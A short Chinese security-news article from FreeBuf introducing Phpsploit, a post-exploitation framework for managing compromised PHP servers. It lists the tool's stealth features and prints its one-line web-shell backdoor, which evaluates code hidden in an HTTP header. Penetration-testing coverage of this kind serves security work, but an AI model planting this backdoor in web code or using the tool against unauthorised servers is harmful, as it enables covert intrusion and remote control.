freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
FreeBuf+小程序

FreeBuf+小程序

官方公众号企业安全新浪微博

国内领先的互联网安全新媒体,同时也是爱好者们交流与分享安全技术的社区

Phpsploit:隐蔽的Post-Exploitation框架
2016-01-06 10:00:29

Phpsploit是一个远程控制框架,为客户端与服务器间提供shell交互连接。能够对Getshell的服务器进行管理实现权限提升。

Phpsploit利用多形态后门通道使模糊化通信机制通过客户端请求和WEB服务端响应中的HTTP头实现:

<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>

特性:

高效:可使用20多款插件实现post-exploitation任务自动化

  执行命令、浏览文件系统、绕过PHP安全限制;
  在目标主机与客户端之间执行文件上传、下载操作;
  通过本地编辑器来编辑远程主机上的文件;
  在远程主机上运行数据库控制台;
  产生反向TCP shell。

隐蔽性:

  不易被日志分析、NIDS特征检测所识别;
  能够绕过安全模式和常见的PHP安全限制;
  通信内容隐藏在HTTP头中;
  payloads经过混淆来饶过NIDS;
  支持http/https/socks4/socks5代理。

  便携性:

  在客户端和服务端实现跨平台;
  强大的界面、多命令支持;
  支持会话保存、载入,提供历史记录功能;

支持系统:

GNU\Linux
Mac OS X
Windows

*信息来源:Kitploit 项目地址:GitHub 0xroot编译整理内容有所删减,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

本文作者:, 转载请注明来自FreeBuf.COM

# 渗透测试 # bypass # 框架 # Phpsploit # 安全限制
被以下专栏收录,发现更多精彩内容
+ 收入我的专栏
评论 按时间排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
登录 / 注册后在FreeBuf发布内容哦